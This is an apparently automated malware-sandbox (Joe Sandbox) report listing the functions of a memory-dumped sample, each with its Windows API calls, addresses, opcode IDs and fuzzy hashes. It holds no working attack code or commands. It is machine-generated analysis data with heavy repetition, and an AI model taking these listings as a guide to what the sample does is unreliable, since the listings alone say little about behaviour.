                                                                                                                • Opcode ID: bac445a213da84b8c8b0f50f417167674c1ef03c0788fe9953c1b718f797bffa
                                                                                                                • Instruction ID: df90c982621d64af9d2e36850a1d9bf4b00618288d909108f427a25dc2775f09
                                                                                                                • Opcode Fuzzy Hash: bac445a213da84b8c8b0f50f417167674c1ef03c0788fe9953c1b718f797bffa
                                                                                                                • Instruction Fuzzy Hash: 08216271900225AFCB109F69CC95A9EBBFCEF49750F04816AF84AD7290DA749A458BB0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D82CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00D818FD,?,?,?,00D826BC,00000000,000000EF,00000119,?,?), ref: 00D82CB9
                                                                                                                  • Part of subcall function 00D82CAA: lstrcpyW.KERNEL32(00000000,?,?,00D818FD,?,?,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D82CDF
                                                                                                                  • Part of subcall function 00D82CAA: lstrcmpiW.KERNEL32(00000000,?,00D818FD,?,?,?,00D826BC,00000000,000000EF,00000119,?,?), ref: 00D82D10
                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D81916
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D8193C
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D81970
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                • Opcode ID: 44e9006019cb1254206dfcb470b58a274d92d53a736d15aec8cbcf1b62e3d7ae
                                                                                                                • Instruction ID: c020d02420224b31967890830c55be79e54dac8d2e8ceb7b225d12711d352417
                                                                                                                • Opcode Fuzzy Hash: 44e9006019cb1254206dfcb470b58a274d92d53a736d15aec8cbcf1b62e3d7ae
                                                                                                                • Instruction Fuzzy Hash: FE11BE3A100306AFCB15BF34CC55E7A77A9FF45350B44802AF80ACB260EB3199468BB0
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00D73D65
                                                                                                                  • Part of subcall function 00D645EC: __FF_MSGBANNER.LIBCMT ref: 00D64603
                                                                                                                  • Part of subcall function 00D645EC: __NMSG_WRITE.LIBCMT ref: 00D6460A
                                                                                                                  • Part of subcall function 00D645EC: RtlAllocateHeap.NTDLL(013B0000,00000000,00000001,?,?,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D6462F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: 5940a257824da5c2bce2cf02b933e6df61d659839101710c8f23859db3e2b886
                                                                                                                • Instruction ID: c4874c28db8edfce454d2c89ebed5bd3b7195097dde29cb88432023ae8baf11a
                                                                                                                • Opcode Fuzzy Hash: 5940a257824da5c2bce2cf02b933e6df61d659839101710c8f23859db3e2b886
                                                                                                                • Instruction Fuzzy Hash: 6A11A332501616AFDB313F74AC057AA3B98FF50360F548525F94D9B191EF34CA40A6B1
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D41E87
                                                                                                                  • Part of subcall function 00D438E4: _memset.LIBCMT ref: 00D43965
                                                                                                                  • Part of subcall function 00D438E4: _wcscpy.LIBCMT ref: 00D439B5
                                                                                                                  • Part of subcall function 00D438E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D439C6
                                                                                                                • KillTimer.USER32(?,00000001), ref: 00D41EDC
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D41EEB
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DB4526
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: 58605c390f9a99a802164769e5a1cc9d95c0cb0dd0de156c8ed0ed9c4b73f186
                                                                                                                • Instruction ID: 6f26a6438f3a3743b0550c816c4778395a4cdec023a7864ac2f78cde3ada2c93
                                                                                                                • Opcode Fuzzy Hash: 58605c390f9a99a802164769e5a1cc9d95c0cb0dd0de156c8ed0ed9c4b73f186
                                                                                                                • Instruction Fuzzy Hash: 19219575544784AFEB32CB248C55FEBBBEC9B41308F08009DE69E96242C7755A85CB71
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00D8715C
                                                                                                                • _memset.LIBCMT ref: 00D8717D
                                                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00D871CF
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00D871D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1157408455-0
                                                                                                                • Opcode ID: f68d4bd1c5e26c0119275fab3ad807e3720fe85789b406f15ab1547f06014323
                                                                                                                • Instruction ID: 5bd1a0d84eea27e6c9e1cf095823b5589d6d8c1abcf1f32dc0e0ab06b823967e
                                                                                                                • Opcode Fuzzy Hash: f68d4bd1c5e26c0119275fab3ad807e3720fe85789b406f15ab1547f06014323
                                                                                                                • Instruction Fuzzy Hash: 4911CA769013287AD7206B65AC4DFEBBA7CEF45760F1441AAF504E72D0D2748E808BB4
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00D813EE
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D81409
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D8141F
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00D81474
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                • String ID:
                                                                                                                • API String ID: 3137044355-0
                                                                                                                • Opcode ID: 1372f78b80108a125fe4d39b5dbf91376a4f58447e739f4d9dbfaa8e5acc7c2d
                                                                                                                • Instruction ID: 94875faa1c3b0a5a273b9d969cf012f7a7400ba294f643b5000633e28012ba78
                                                                                                                • Opcode Fuzzy Hash: 1372f78b80108a125fe4d39b5dbf91376a4f58447e739f4d9dbfaa8e5acc7c2d
                                                                                                                • Instruction Fuzzy Hash: D7217F7950030AABDB20AF95DC88EDABBBCEF00744F008569E55297150D774EA4ADF71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7B78E: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D7B7A5
                                                                                                                  • Part of subcall function 00D7B78E: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D7B7AF
                                                                                                                  • Part of subcall function 00D7B78E: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D7B7BE
                                                                                                                  • Part of subcall function 00D7B78E: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D7B7C5
                                                                                                                  • Part of subcall function 00D7B78E: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D7B7DB
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,00D7BB10,?,?), ref: 00D7BFAA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D7BFB6
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00D7BFBD
                                                                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 00D7BFD6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 4217664535-0
                                                                                                                • Opcode ID: d90c24a010f1a8065d90ee4ba9d8d9c894e9e9715f5ac4cf862f9dd71a96c0ab
                                                                                                                • Instruction ID: f1ab2c055705f922a8d49e10481eb1de8a7f05bbfdf0c2f52647e3ad69cb9547
                                                                                                                • Opcode Fuzzy Hash: d90c24a010f1a8065d90ee4ba9d8d9c894e9e9715f5ac4cf862f9dd71a96c0ab
                                                                                                                • Instruction Fuzzy Hash: 0B115175600206BFDB149F98DC85EBEF7A9EF45724B18842EE846D7210E732AE45DB30
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F282
                                                                                                                  • Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F2A6
                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00D992F0
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D992FB
                                                                                                                • _memmove.LIBCMT ref: 00D99328
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00D99333
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504782959-0
                                                                                                                • Opcode ID: 6ddfefaaa2d943ec0978b6037a6f92950757f930815f5c1a5d95e0e3fc2229af
                                                                                                                • Instruction ID: d4c385f98c01d94230e1b1298cbce92d473e57bacfcfb72fa41ff9bd571dfd6f
                                                                                                                • Opcode Fuzzy Hash: 6ddfefaaa2d943ec0978b6037a6f92950757f930815f5c1a5d95e0e3fc2229af
                                                                                                                • Instruction Fuzzy Hash: 77112B7660010AAFCF04FBA4CD56CAEB7BAEF04311B144065F506E72A2DB30AE04DBB1
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00D7C285
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7C297
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7C2AD
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7C2C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 2a7ea6926cb258c5818e8c973281d8299b02a07ac3e539a3b0f92411eb9d1f66
                                                                                                                • Instruction ID: 670b461831660beefedc7951a3ab05281b1d03989f034743d564f15d3336876f
                                                                                                                • Opcode Fuzzy Hash: 2a7ea6926cb258c5818e8c973281d8299b02a07ac3e539a3b0f92411eb9d1f66
                                                                                                                • Instruction Fuzzy Hash: 1A112A7A941218FFDB11DFE8CC85E9DBBB4FB08710F204095EA04B7294E671AE10DBA4
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D87C6C
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00D87C9F
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D87CB5
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D87CBC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880819207-0
                                                                                                                • Opcode ID: 72429cba2d101bcb06ab13e1ebd6bd2720227a14a379226942a23d743a425fb7
                                                                                                                • Instruction ID: 0b7043e48fdec7652d1a2ca83d4aa8315ea9909e9e6a58693d4d03ef2f21e975
                                                                                                                • Opcode Fuzzy Hash: 72429cba2d101bcb06ab13e1ebd6bd2720227a14a379226942a23d743a425fb7
                                                                                                                • Instruction Fuzzy Hash: 86110472A04305BFC702ABB9DC08EAA7FAE9B44325F184225F865E3391D771C94887B0
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00D5C66B
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3970641297-0
                                                                                                                • Opcode ID: f734c92e00be7805403fd70ff93293b090dec131d6ba52f69417ec340ba88f46
                                                                                                                • Instruction ID: 7295b5c0b7bec2dbd63dce2a91b570c7d36e58b6a68ced82f8b3a170f2d8a4ef
                                                                                                                • Opcode Fuzzy Hash: f734c92e00be7805403fd70ff93293b090dec131d6ba52f69417ec340ba88f46
                                                                                                                • Instruction Fuzzy Hash: 1F11A17251174ABFDF114FA09C44EEA7B69EF08355F095111FE0492120C732DD60DBB1
                                                                                                                APIs
                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?,?,?), ref: 00DAFF85
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • GetClientRect.USER32(?,?), ref: 00DAFF2F
                                                                                                                • GetCursorPos.USER32(?), ref: 00DAFF39
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00DAFF44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4127811313-0
                                                                                                                • Opcode ID: 80f51311cd556861881fd6a3397d6aada9254f31cfde5aebae084306c20316f2
                                                                                                                • Instruction ID: 4ed91c6ac506b3c23c1db6ee3d29eb9bf23cba66642739c87b07942fc396df38
                                                                                                                • Opcode Fuzzy Hash: 80f51311cd556861881fd6a3397d6aada9254f31cfde5aebae084306c20316f2
                                                                                                                • Instruction Fuzzy Hash: 0111C83550011AAFDF049FA8DC858AE77B9FF06301B1444A5F952E6151E730EA8A8BB1
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D849EE
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D84A13
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D84A1D
                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D84A50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2875609808-0
                                                                                                                • Opcode ID: d3c6ec7d434d42afdb308e461fb9a42ba9a2f31b2c328139dba2bbff0459543d
                                                                                                                • Instruction ID: 17f25f9d40bbb460a9b2f2f08db385e9f0d126466b2aef321ea9aebd86c0f8ff
                                                                                                                • Opcode Fuzzy Hash: d3c6ec7d434d42afdb308e461fb9a42ba9a2f31b2c328139dba2bbff0459543d
                                                                                                                • Instruction Fuzzy Hash: D7115A31D4061ADBCF04AFE5DA88AEEBB78FF08705F054059E941BA240CB309650CBB9
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                • Instruction ID: 666b1dc6f024782fbf4a7696f715ba12f597dcc2bd7e2c5719b6c8c51d6d2b53
                                                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                • Instruction Fuzzy Hash: EC014E3200064EBBCF125E84EC41DEE3F62FB18350B588515FE1C59035E276C9B1ABA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D6869D: __getptd_noexit.LIBCMT ref: 00D6869E
                                                                                                                • __lock.LIBCMT ref: 00D6811F
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00D6813C
                                                                                                                • _free.LIBCMT ref: 00D6814F
                                                                                                                • InterlockedIncrement.KERNEL32(013D39E0), ref: 00D68167
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2704283638-0
                                                                                                                • Opcode ID: cf7199c04679160b7c1084acc4c96aca3b1f1b9f6f557de72458566473f4a217
                                                                                                                • Instruction ID: 9994436c63fbe107fde06ff0bf869a9cf51d311af4a8ba57659ea84915f84731
                                                                                                                • Opcode Fuzzy Hash: cf7199c04679160b7c1084acc4c96aca3b1f1b9f6f557de72458566473f4a217
                                                                                                                • Instruction Fuzzy Hash: F4019271901B129BCB12AF68D8067AD73A0FF06715F094219F418A7791CF389942EFF2
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00DADE07
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00DADE1F
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00DADE43
                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DADE5E
                                                                                                                Memory Dump Source
